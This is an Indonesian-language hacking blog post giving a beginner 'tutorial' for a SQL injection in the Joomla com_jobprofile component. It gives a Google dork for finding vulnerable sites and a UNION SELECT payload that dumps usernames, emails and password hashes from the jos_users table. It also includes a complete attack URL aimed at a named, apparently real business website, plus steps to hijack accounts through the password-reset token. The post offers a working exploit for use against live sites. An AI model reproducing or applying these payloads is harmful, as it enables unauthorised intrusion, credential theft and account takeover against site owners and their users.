joomla SQL Injection Vulnerability

selamat siang sobat ada sdikit mainan nihh buat yg masih belajar kaya ane =))

mungkin ni exploit jadul tp masih work cuy :*

buat master lewat ajah yaahh =))

dork : inurl:"index.php?option=com_jobprofile... dork bisa di explorasi lg sesuka hati =))

• exploit : +union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users–

demo :http://www.chartercommerce.com.au/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1

• http://www.chartercommerce.com.au/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params),3,4,5,6,7,8,9+from+jos_users-- 
• 
  

reset pass : /index.php?option=com_user&view=reset

masukin emailnya d kolom itu lalu klik submit ,,setelah itu masukan token yg di dapat td lalu klik submit...alhasil tinggal tulis password baru =)),,,

NB : kalo tokennya ada symbol $$$$ ( salt ) mendingan cari target lain karena w juga mumet ma salt piye carane buat tusbol =))

segitu ajah tutor dari sinchankeke ganteng =)) klo ada salah2 kata atau tutornya busuk minal aidzin walfaidzin yah ..wkakakakaka :* muaaahh 

Description: joomla SQL Injection Vulnerability Rating: 5 Reviewer: Unknown - ItemReviewed: joomla SQL Injection Vulnerability